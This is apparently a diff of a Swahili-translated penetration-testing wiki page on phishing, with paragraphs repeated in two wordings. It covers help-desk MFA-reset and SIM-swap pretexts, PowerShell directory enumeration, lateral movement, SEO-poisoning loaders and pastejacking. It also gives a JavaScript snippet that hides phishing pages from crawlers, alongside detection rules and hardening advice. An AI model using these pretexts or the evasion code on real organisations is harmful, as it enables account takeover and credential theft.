* Mshawishi agent afanye **reset ya MFA secret** au kufanya **SIM-swap** kwa namba ya simu iliyosajiliwa.
3. Hatua za mara moja baada ya kupata ufikiaji (≤60 min kwa matukio halisi)
* Tumia njia ya msingi kupitia web SSO portal yoyote kuanzisha foothold.
* Ordo AD / AzureAD kwa zana zilizojengwa (bila kupeleka binaries):
```powershell
# list directory groups & privileged roles
Get-ADGroup -Filter * -Properties Members | ?{$_.Members -match $env:USERNAME}
@ -467,56 +467,56 @@ Get-MgDirectoryRole | ft DisplayName,Id
# Enumerate devices the account can login to
Get-MgUserRegisteredDevice -UserId <user@corp.local>
```
* Kuhamia upande wa ndani kwa kutumia **WMI**, **PsExec**, au agents halali za **RMM** ambazo tayari zimewekwa kwenye whitelist ndani ya mazingira.
* Mwendo wa pande (lateral movement) kwa **WMI**, **PsExec**, au wakala halali wa **RMM** tayari waliowekwa kwenye whitelist ya mazingira.
### Detection & Mitigation
* Tibu help-desk identity recovery kama **operesheni ya kipaumbele** hitaji step-up auth & idhini ya manager.
* Tumia **Identity Threat Detection & Response (ITDR)** / **UEBA** rules zinazotia alarm juu ya:
* MFA method changed + authentication kutoka kwenye device / geo mpya.
* Kuongezeka mara moja kwa ruhusa kwa mfano huo huo (user-→-admin).
* Rekodi simu za help-desk na lipa utekelezaji wa **call-back kwa namba iliyosajiliwa tayari** kabla ya reset yoyote.
* Tekeleza **Just-In-Time (JIT) / Privileged Access** ili akaunti zilizorekebishwa hivi karibuni **zisipate** token za uenyekiti wa juu moja kwa moja.
* Tibu identity recovery ya help-desk kama **operesheni yenye vibali** hitaji step-up auth & approval ya manager.
* Tengeneza kanuni za **Identity Threat Detection & Response (ITDR)** / **UEBA** ambazo zinaonya juu ya:
* Mbinu ya MFA imebadilishwa + uthibitisho kutoka kifaa kipya / geo.
* Kuinuka mara moja kwa mcheleweshaji uleule (user-→-admin).
* Rekodi simu za help-desk na uweke kanuni ya **call-back kwenye namba iliyosajiliwa kabla** ya reset yoyote.
* Tekeleza **Just-In-Time (JIT) / Privileged Access** ili akaunti zilizorejeshwa hivi karibuni **zisizopata** moja kwa moja token za hali ya juu.
---
## At-Scale Deception SEO Poisoning & “ClickFix” Campaigns
Mataifa ya kawaida hupunguza gharama za operesheni za high-touch kwa shambulio la wingi linalotumia **search engines & ad networks kama njia ya utoaji**.
Mafungu ya kawaida yanagharamia gharama za operesheni za high-touch kwa mashambulizi ya wingi yanayofanya **search engines & ad networks kuwa chaneli ya utoaji**.
1. **SEO poisoning / malvertising** inasukuma matokeo ya uongo kama `chromium-update[.]site` kwenye matangazo ya juu ya search ads.
2. Mwathiriwa anapakua loader ndogo ya hatua ya kwanza (mara nyingi JS/HTA/ISO). Mifano iliyoshuhudiwa na Unit 42:
1. **SEO poisoning / malvertising** inasukuma matokeo bandia kama `chromium-update[.]site` juu ya matangazo ya utafutaji.
2. Mwathiriwa anapakua loader ndogo ya **first-stage** (mara nyingi JS/HTA/ISO). Mifano iliyoshuhudiwa na Unit 42:
* `RedLine stealer`
* `Lumma stealer`
* `Lampion Trojan`
3. Loader inatoa exfiltrate browser cookies + credential DBs, kisha inachukua **silent loader** ambayo inaamua kwa wakati halisi ikiwa itaweka:
* RAT (mfano AsyncRAT, RustDesk)
3. Loader huondoa cookies za browser + credential DBs, kisha huvuta **silent loader** ambayo inaamua *kwa wakati-halisi* kama itapeleka:
* RAT (mf. AsyncRAT, RustDesk)
* ransomware / wiper
* sehemu ya persistence (Run key ya registry + scheduled task)
* sehemu ya persistence (registry Run key + scheduled task)
### Hardening tips
* Zuia domains zilizosajiliwa hivi karibuni & tekeleza **Advanced DNS / URL Filtering** kwenye *search-ads* pamoja na e-mail.
* Zuia ufungaji wa software isipokuwa MSI / Store packages zilizosainiwa, kata utekelezaji wa `HTA`, `ISO`, `VBS` kwa sera.
* Simamia kwa ajili ya child processes za browsers zinazoanisha installers:
* Zuia domains zilizosajiliwa hivi karibuni & fanya utekelezaji wa **Advanced DNS / URL Filtering** kwa *search-ads* pamoja na barua pepe.
* Zuia usakinishaji wa software isipokuwa MSI / Store zilizosainiwa, ukatae utekelezaji wa `HTA`, `ISO`, `VBS` kwa sera.
* Sibiti kwa mfuatiliaji mchakato watoto wa browsers waliopenisha installers:
```yaml
- parent_image: /Program Files/Google/Chrome/*
and child_image: *\\*.exe
```
* Kagua LOLBins zinazotumika mara kwa mara na first-stage loaders (mfano `regsvr32`, `curl`, `mshta`).
* Tafuta LOLBins zinazotumika mara kwa mara na first-stage loaders (mf. `regsvr32`, `curl`, `mshta`).
---
## AI-Enhanced Phishing Operations
Wavamizi sasa wanachanganya **LLM & voice-clone APIs** kwa lures zilizobinafsishwa kikamilifu na mwingiliano wa wakati halisi.
Wavamizi sasa wanachanganua **LLM & voice-clone APIs** kwa lures zilizobinafsishwa kabisa na mwingiliano wa wakati-halisi.
| Layer | Mfano wa matumizi na mtoo wa vitisho |
|-------|--------------------------------------|
|Automation|Generate & send >100 k emails / SMS with randomised wording & tracking links.|
|Generative AI|Produce *one-off* emails referencing public M&A, inside jokes from social media; deep-fake CEO voice in callback scam.|
|Agentic AI|Autonomously register domains, scrape open-source intel, craft next-stage mails when a victim clicks but doesnt submit creds.|
| Layer | Mfano wa matumizi na mtendaji wa tishio |
|-------|-----------------------------|
|Automation|Tengeneza & tuma >100k emails / SMS zenye maneno yaliyobadilishwa & viungo vya tracking.|
|Generative AI|Zalisha barua pepe za *one-off* zikirejea M&A za umma, vichekesho vya ndani kutoka social media; sauti bandia ya CEO kwenye simu ya udanganyifu.|
|Agentic AI|Jisajili mwenyewe domains, scrape intel ya open-source, unda barua za hatua inayofuata wakati mwathiriwa anabonyeza lakini hakutuma creds.|
Ulinzi:
• Ongeza **dynamic banners** zinazobainisha ujumbe ulioletwa na automation isiyotumika kwa kuaminika (kupitia ARC/DKIM anomalies).
• Tekeleza **voice-biometric challenge phrases** kwa maombi ya hatari kwenye simu.
• Endelea kutekeleza majaribio ya lures zilizotengenezwa na AI katika programu za uhamasishaji templates imara zimepitwa na wakati.
**Defence:**
• Ongeza **bango zinazoibuka** zinazoonyesha ujumbe ulioletwa na automation isiyo ya kuaminika (kutokana na ARC/DKIM anomalies).
• Tumia **voice-biometric challenge phrases** kwa maombi ya simu yenye hatari kubwa.
• Endelea kufanya majaribio ya lures zilizotengenezwa na AI katika programu za uelimishaji templates za static hazifai tena.
See also agentic browsing abuse for credential phishing:
@ -527,19 +527,19 @@ ai-agent-mode-phishing-abusing-hosted-agent-browsers.md
---
## MFA Fatigue / Push Bombing Variant Forced Reset
Mbali na push-bombing ya kawaida, operator wanaweza tu **lazimisha usajili mpya wa MFA** wakati wa simu ya help-desk, wakifuta token ya mtumiaji iliyokuwepo. Kumbukumbu yoyote inayofuata ya login itaonekana halali kwa mwathiriwa.
Mbali na push-bombing ya jadi, operator kwa urahisi **wanafanya rejista mpya ya MFA** wakati wa simu ya help-desk, kuharibu token iliyokuwepo ya mtumiaji. Kila ombi la kuingia linalofuata linaonekana halali kwa mhusika.
```text
[Attacker] → Help-Desk: “I lost my phone while travelling, can you unenrol it so I can add a new authenticator?”
[Help-Desk] → AzureAD: Delete existing methods → sends registration e-mail
[Attacker] → Completes new TOTP enrolment on their own device
```
Fuatilia matukio ya AzureAD/AWS/Okta ambapo **`deleteMFA` + `addMFA`** yanatokea **katika dakika chache kutoka IP ile ile**.
Fuatilia matukio ya AzureAD/AWS/Okta ambapo **`deleteMFA` + `addMFA`** yanatokea **ndani ya dakika chache kutoka kwenye IP ileile**.
## Clipboard Hijacking / Pastejacking
Wavamizi wanaweza kwa utulivu kunakili amri zenye madhara kwenye clipboard ya mwathiriwa kutoka kwenye ukurasa wa wavuti uliovamiwa au typosquatted, kisha kumdanganya mtumiaji kubandika ndani ya **Win + R**, **Win + X** au dirisha la terminal, wakitekeleza arbitrary code bila kupakua au kiambatisho.
Wavamizi wanaweza kunakili kimya kimya maagizo ya kukera kwenye clipboard ya mwathirika kutoka kwenye ukurasa wa wavuti uliobambikiwa au typosquatted, kisha kumdanganya mtumiaji kuyabandika ndani ya **Win + R**, **Win + X** au terminal window, na hivyo kuendesha code yoyote bila kupakua au kutumia attachment.
{{#ref}}
@ -553,6 +553,33 @@ clipboard-hijacking.md
mobile-phishing-malicious-apps.md
{{#endref}}
### Mobilegated phishing to evade crawlers/sandboxes
Waendeshaji wanaziba mtiririko wao wa phishing nyuma ya ukaguzi rahisi wa kifaa ili crawlers za desktop zisifike kwenye kurasa za mwisho. Mfano wa kawaida ni script ndogo inayotesta ikiwa DOM ina uwezo wa touch na kutuma matokeo kwa server endpoint; clients zisizo za mobile hupokea HTTP 500 (au ukurasa tupu), wakati watumiaji wa mobile wanapewa mtiririko kamili.
Minimal client snippet (typical logic):
```html
<script src="/static/detect_device.js"></script>
```
`detect_device.js` mantiki (imefupishwa):
```javascript
const isMobile = ('ontouchstart' in document.documentElement);
fetch('/detect', {method:'POST', headers:{'Content-Type':'application/json'}, body: JSON.stringify({is_mobile:isMobile})})
.then(()=>location.reload());
```
Mienendo ya server inayoshuhudiwa mara nyingi:
- Huweka session cookie wakati wa mzigo wa kwanza.
- Accepts `POST /detect {"is_mobile":true|false}`.
- Inarudisha 500 (au placeholder) kwa GETs zinazofuata wakati `is_mobile=false`; inahudumia phishing tu ikiwa `true`.
Uwindaji na kanuni za utambuzi:
- urlscan query: `filename:"detect_device.js" AND page.status:500`
- Telemetry ya Web: mfululizo wa `GET /static/detect_device.js``POST /detect` → HTTP 500 kwa nonmobile; njia halali za mobile victim hurudisha 200 pamoja na HTML/JS za kuendelea.
- Zuia au chunguza kwa makini kurasa zinazotegemea yaliyomo pekee kwa `ontouchstart` au ukaguzi wa kifaa kama hicho.
Vidokezo vya ulinzi:
- Endesha crawlers zenye mobilelike fingerprints na JS imewezeshwa ili kufichua gated content.
- Toa tahadhari juu ya majibu 500 yenye shaka yanayotokea baada ya `POST /detect` kwenye domains zilizosajiliwa hivi karibuni.
## References
- [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)
@ -560,5 +587,6 @@ mobile-phishing-malicious-apps.md
- [https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/](https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/)
- [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
- [2025 Unit 42 Global Incident Response Report Social Engineering Edition](https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-report-social-engineering-edition/)
- [Silent Smishing mobile-gated phishing infra and heuristics (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/)
{{#include ../../banners/hacktricks-training.md}}